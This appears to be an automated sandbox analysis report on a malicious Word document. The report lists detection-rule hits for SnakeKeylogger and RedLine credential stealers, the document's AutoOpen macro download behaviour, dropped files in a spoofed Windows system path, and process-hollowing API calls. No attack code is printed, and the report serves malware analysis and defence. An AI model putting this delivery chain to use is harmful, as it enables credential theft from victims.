Source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.npratlsN.pif.23cc0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.npratlsN.pif.2b48a8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2dd40ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.npratlsN.pif.242f0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2.brightness.exe.21890948.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.npratlsN.pif.29aec7e8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.npratlsN.pif.2dd40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2bb8a8ee.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.npratlsN.pif.2bb89a06.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2dd40ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.npratlsN.pif.2e310ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.npratlsN.pif.2bb89a06.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.214f9a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2b48a8ee.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2dd40000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2e310ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2e310000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.npratlsN.pif.23cc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.1.npratlsN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 13.2.Nsltarpn.PIF.20fe67a8.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2b489a06.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2ea90000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.npratlsN.pif.242f0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.npratlsN.pif.23cc0ee8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.npratlsN.pif.214f9a06.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.npratlsN.pif.214fa8ee.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.npratlsN.pif.2e490000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.1.npratlsN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.2.npratlsN.pif.2bb8a8ee.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.npratlsN.pif.2e490000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.2.npratlsN.pif.2ea90000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.npratlsN.pif.29aec7e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 14.2.npratlsN.pif.214fa8ee.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000001.1859265751.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.3432289694.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000E.00000002.3465867271.00000000242F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.3472158712.000000002DD40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000010.00000002.3464658722.000000002E310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000003.1988530377.000000001F96E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3462362371.000000002B449000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.3456650715.000000002BB49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.3432404801.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.3473586471.000000002E490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000E.00000002.3465440531.0000000023CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.3432275183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000003.1862021151.0000000029AEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000003.2059147464.0000000029E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000002.3456832626.00000000214B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000E.00000001.1974371913.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000010.00000001.2054825787.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000010.00000002.3465905610.000000002EA90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: Process Memory Space: npratlsN.pif PID: 4544, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: npratlsN.pif PID: 3592, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: npratlsN.pif PID: 6036, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: PI ITS15235.doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'ADODB.Stream' functions open, savetofile, write
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'ADODB.Stream' functions open, savetofile, write			Name: AutoOpen

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: PI ITS15235.doc	Stream path 'Macros/VBA/ThisDocument' : found possibly 'XMLHttpRequest' functions response, responsebody, open, send
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function AutoOpen, found possibly 'XMLHttpRequest' functions response, responsebody, open, send			Name: AutoOpen

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to dropped file

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\InprocServer32			Jump to behavior

PE file contains section with special chars

Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .
Source: NETUTILS.dll.4.dr	Static PE information: section name: .

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_029082CC NtReadVirtualMemory,	4_2_029082CC
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290E064 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,	4_2_0290E064
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290853C NtUnmapViewOfSection,	4_2_0290853C
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02907A2C NtAllocateVirtualMemory,	4_2_02907A2C
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290DEF8 Rt,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_0290DEF8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290DF80 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,	4_2_0290DF80
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02908C28 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02908C28
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02907D78 NtWriteVirtualMemory,	4_2_02907D78
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02907A2A NtAllocateVirtualMemory,	4_2_02907A2A
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_0290DEA4 Rt,RtlDosPathNameToNtPathName_U,NtDeleteFile,	4_2_0290DEA4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_02908C26 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	4_2_02908C26
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_029182CC NtReadVirtualMemory,	13_2_029182CC
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_0291E064 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	13_2_0291E064
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_0291853C NtUnmapViewOfSection,	13_2_0291853C
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_02917A2C NtAllocateVirtualMemory,	13_2_02917A2C
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_02918C28 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	13_2_02918C28
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_02917D78 NtWriteVirtualMemory,	13_2_02917D78
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_029185C8 NtUnmapViewOfSection,	13_2_029185C8
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_02917A2A NtAllocateVirtualMemory,	13_2_02917A2A
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_0291DEA4 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	13_2_0291DEA4
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_0291DEF8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	13_2_0291DEF8
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_0291DF80 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	13_2_0291DF80
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 13_2_02918C26 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	13_2_02918C26
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_028882CC NtReadVirtualMemory,	15_2_028882CC
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_0288E064 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,	15_2_0288E064
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_0288853C NtUnmapViewOfSection,	15_2_0288853C
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_02887A2C NtAllocateVirtualMemory,	15_2_02887A2C
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_02888C28 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	15_2_02888C28
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_02887D78 NtWriteVirtualMemory,	15_2_02887D78
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_028885C8 NtUnmapViewOfSection,	15_2_028885C8
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_02887A2A NtAllocateVirtualMemory,	15_2_02887A2A
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_0288DEA4 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	15_2_0288DEA4
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_0288DEF8 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,	15_2_0288DEF8
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_0288DF80 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,	15_2_0288DF80
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Code function: 15_2_02888C26 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,	15_2_02888C26

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 4_2_02908654 CreateProcessAsUserW,

4_2_02908654

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	File created: C:\Windows\SysWOW64\brightness.exe	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows \SysWOW64	Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

File deleted: C:\Windows \SysWOW64\svchost.pif

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 4_2_028F20C4	4_2_028F20C4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00408C60	10_2_00408C60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_0040DC11	10_2_0040DC11
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00407C3F	10_2_00407C3F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00418CCC	10_2_00418CCC
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00406CA0	10_2_00406CA0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_004028B0	10_2_004028B0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_0041A4BE	10_2_0041A4BE
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00408C60	10_2_00408C60
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00418244	10_2_00418244
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00401650	10_2_00401650
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00402F20	10_2_00402F20
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_004193C4	10_2_004193C4
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00418788	10_2_00418788
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00402F89	10_2_00402F89
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_00402B90	10_2_00402B90
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_004073A0	10_2_004073A0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_29A51560	10_2_29A51560
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_29A5154F	10_2_29A5154F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_29A512C0	10_2_29A512C0
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5C8F18	10_2_2E5C8F18
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5CAF0F	10_2_2E5CAF0F
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 10_2_2E5C5FA8	10_2_2E5C5FA8
